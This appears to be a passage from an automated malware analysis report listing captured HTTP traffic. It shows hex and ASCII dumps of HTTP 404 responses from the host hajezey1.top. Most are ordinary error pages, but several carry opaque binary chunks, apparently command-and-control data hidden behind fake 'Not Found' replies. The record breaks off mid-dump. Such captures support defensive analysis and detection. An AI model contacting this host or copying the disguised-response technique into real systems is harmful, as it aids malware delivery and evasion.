Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 81 71 e5 77 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 a5 98 87 cd 2b 80 78 51 a1 a2 8f bc 82 df 1c e0 32 02 50 08 88 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 01 82 20 59 55 11 5c 2c 34 67 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 01 75 cb 8a 40 d8 06 0e 45 07 13 7d 7b f9 e0 04 89 f9 d4 57 80 90 70 89 ec be 4a 6b 0e e1 a2 22 48 92 d2 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 53 68 58 96 da 19 d1 3a 2d e8 43 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 65 85 4a 04 38 ad 7f 14 2c d0 e8 b1 14 23 71 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 62 41 64 cd 25 5c 8d b7 f5 23 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 75 8d b5 be 34 56 9b 46 76 99 86 11 00 83 32 42 92 51 ce ae b8 6b 95 36 e1 48 52 67 76 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 
57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 8e 5f 04 25 18 f5 aa 85 b9 a5 13 ea 0e cb 2d e5 00 0c cc 52 a2 bd 71 b6 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82O_%-RqdP0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 